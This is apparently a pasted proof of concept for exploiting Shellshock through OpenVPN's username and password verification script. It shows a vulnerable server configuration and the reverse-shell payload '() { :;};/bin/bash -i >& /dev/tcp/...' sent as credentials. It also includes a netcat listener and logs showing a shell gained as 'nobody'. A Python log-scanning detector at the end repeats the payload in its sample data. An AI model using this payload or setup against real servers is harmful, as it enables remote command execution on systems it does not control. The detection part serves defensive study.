OpenVPN ShellShock PoC

a guest Sep 30th, 2014 15,318 Never
# OpenVPN ShellShock PoC
# Based on Fredrik Strömberg's HN post: https://news.ycombinator.com/item?id=8385332
# Verified by @fj33r, posted at: http://sprunge.us/BGjP

### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3

### user.sh
#!/bin/bash
echo "$username"
echo "$password"

### start server
openvpn server.conf

### terminal 1
nc -lp 4444

### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo

### username && password were both shellshocked just in case
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &

### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__

Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting

### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
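
### log detection (added example, not part of the original paste)
# The AUTH-PAM line in the log above records the submitted username verbatim, so a server log can be scanned for usernames that begin with a bash function definition. The function and pattern names below are assumptions of this sketch, and the sample log is constructed from three lines of the log above plus benign lines added for contrast.

```python
import re

# Username as written by the openvpn-auth-pam plugin (greedy, so quotes
# inside the username do not truncate the capture).
AUTH_PAM = re.compile(r"AUTH-PAM: BACKGROUND: user '(.*)' failed to authenticate")
# Value that starts with a bash function definition, "() {".
FUNC_DEF = re.compile(r"\s*\(\s*\)\s*\{")
# Timestamped OpenVPN line that carries a peer address.
PEER = re.compile(r"\w{3} \w{3}\s+\d{1,2} [\d:]{8} \d{4} (\d{1,3}(?:\.\d{1,3}){3}):\d+ ")

# Constructed sample: the 'alice' and 10.10.0.77 lines are invented.
SAMPLE_LOG = """\
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
AUTH-PAM: BACKGROUND: user 'alice' failed to authenticate: Authentication failure
Mon Sep 29 21:03:10 2014 10.10.0.77:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
"""


def find_shellshock_logins(log_text):
    """Return [{'peer': ip or None, 'username': str}] for flagged logins."""
    findings, pending = [], []
    for line in log_text.splitlines():
        auth = AUTH_PAM.search(line)
        if auth:
            if FUNC_DEF.match(auth.group(1)):
                pending.append(auth.group(1))
            continue
        peer = PEER.match(line)
        # The AUTH-PAM line has no timestamp or peer, so attribute it to the
        # next PLUGIN_AUTH_USER_PASS_VERIFY result line. This is a heuristic:
        # with concurrent logins the next result may belong to another client.
        if peer and "PLUGIN_AUTH_USER_PASS_VERIFY" in line and pending:
            findings += [{"peer": peer.group(1), "username": u} for u in pending]
            pending = []
    # Flagged usernames with no following result line stay unattributed.
    findings += [{"peer": None, "username": u} for u in pending]
    return findings


if __name__ == "__main__":
    for hit in find_shellshock_logins(SAMPLE_LOG):
        print(hit["peer"], repr(hit["username"]))
```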